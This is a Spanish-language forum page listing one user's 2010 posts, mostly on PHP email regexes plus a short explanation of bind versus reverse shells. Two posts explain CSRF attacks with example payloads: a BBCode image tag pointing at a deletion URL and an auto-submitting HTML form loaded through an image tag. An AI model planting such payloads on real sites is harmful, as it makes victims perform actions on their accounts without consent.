Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - ~ Yoya ~

#1031
Nivel Web / Re: Duda sobre xss
24 Enero 2010, 21:54 PM
Cita de: cɐstg en 24 Enero 2010, 21:49 PM
asi de facil se ejecuta ‭‬‭‬javascript en una imgaen :s seria muy facil robar cookies...

No entiendes bien, Cuando inserto una img con BBCODE estoy haciendo una peticion GET, pero cuando uso por ejemplo, <img <src=""> o un iframe estoy haciendo una peticion post. Si quieres puedes hacer una prueba..

Y otra cosa, Yo no estoy ejecutando javascript en la img, lo que estoy haciendo es hacer una peticion a un archivo y ese archivo con tiene un codigo javascript, osea el javascript se esta ejecutando en el host que tengo el archivo con javascript y no en la pagina que quiero atakar.
#1032
Nivel Web / Re: Duda sobre xss
24 Enero 2010, 20:48 PM
Bueno aqui doy algunos metodos de atake CSRF mediante peticion GET y POST.

Bueno, tener claro que algunas veces los formularios envían datos por POST pero pasan la variable por $_REQUEST, osea que aunque el formulario la envié por post puedes enviar una petición GET y te la aceptara.

Ok, ahora si tenemos CSRF por metodo GET podemos hacer lo siguiente.
Si se puede usar BBCODE utilisaremos tags que se ejecutan al visualisarlo como puede ser los tag de
img, y entre los tags de imagenes insertamos el CSRF y al visualisar la img estara haciendo la peticion GET.
[IMG]http://serve.com/usuario/eliminar.php
[/IMG]


Por metodo post.
Primero crearemos un formulario que tenga los valores puesto y todo y lo enviaremos con javascript.
<html><body>
<form name="topic" method="post" action="http://serve.com/crear_post.php">
<textarea name='topic' rows='5' cols='50' value='lalallalala'></textarea>
</form>
<script>document.topic.submit()</script>
</body></html>


Luego lo subimos a un host. Ahora lo que haremos es llamar nuestro scrit y crear el post.
Con esto lo llamaria:
<IMG SRC="http://host.com/formulario_que_enviara_el_CSRF.html">
Y al tratar de visualisar la img estaria ejecutando el formulario xD.

Saludos.
#1033
A mi no me da error
#1034
PHP / Re: Expresión regular
24 Enero 2010, 01:21 AM
Naaa la mía no es indentica a la tuya, la mía es mejor jajaja (broma).
Ps eso, el $  indica que algo debe estar al final de la cadena, no indica el final de la cadena.
#1035
PHP / Re: Expresión regular
24 Enero 2010, 00:53 AM
Bueno, si el mail comienza con letra tu exprecion falla. aqui explico la mia.
^/[a-z0-9_.-]+\@[a-z0-9._-]+\.\w{2,3}$/i
Primero indico que la cadena debe comenzar con letras, numero, guion y punto y indico que pueden aparecer una o mas veces. luego con el @ indico que hasta hay llegara o si no se toma todo, luego indico que despues del @ pueden haber, letras, numero, puntos y guion.luego indico el punto  y despues indico que despues del punto puede aparecer, numeros, letras y guion y que debe tener minimos 2 caracter y maximo 3 y que solo debe estar al final.
#1036
PHP / Re: Expresión regular
24 Enero 2010, 00:40 AM
Esta exprecion no es muy confiable:
^[a-zA-Z][\w\.\-\_]+\@[\w\.\-\_]+\.\w{2,4}$
Ya que primero dice que si al principio aparecen palabras en mayuscula o minuscula y si al principio no hay palabras si no numero no funcionara la exprecion regular como deberia de ser.
#1037
PHP / Re: Expresión regular
24 Enero 2010, 00:29 AM
/([a-z0-9_.-]+)@([a-z0-9_-]+)\.\w{2,3}/i
Bueno esta es la mía, le pongo el operador i al final que dice que ignore el uso de mayúscula y minúscula.

Tampoco es necesario poner
[\w\.\-\_]
si con
[\w.-_]
Estas haciendo lo mismo.
La de raul338  parece una exprecion regular ofuscada jajaja.

Saludos.
#1038
PHP / Re: Expresión regular
23 Enero 2010, 23:23 PM
Aver, pon ejemplo un de un correo, porque usas tantas cosas innecesarias que creo que no es un correo común xD.

Poner un ejemplo del correo y decir que parte del correo necesitas sacar...

Porque estas gastando recursos innecesarios.

Saludos.
#1039
bind shell te deja una shell permanente en un sistema, y reverse te devuelve una shell.
#1040
Cita de: cΔssiΔni en 20 Enero 2010, 04:06 AM
si, con el return no debería tener problemas, aunque el menciona que le va igual.

saludos!!
La función return, retorna un valor, mayormente se usa junto a funciones, pero en este caso no se quiere retornar un valor, si no que solo imprimirlo, las subrutinas se pueden usar para crear funciones o crear sub codigos que estan dentro del codigo principal.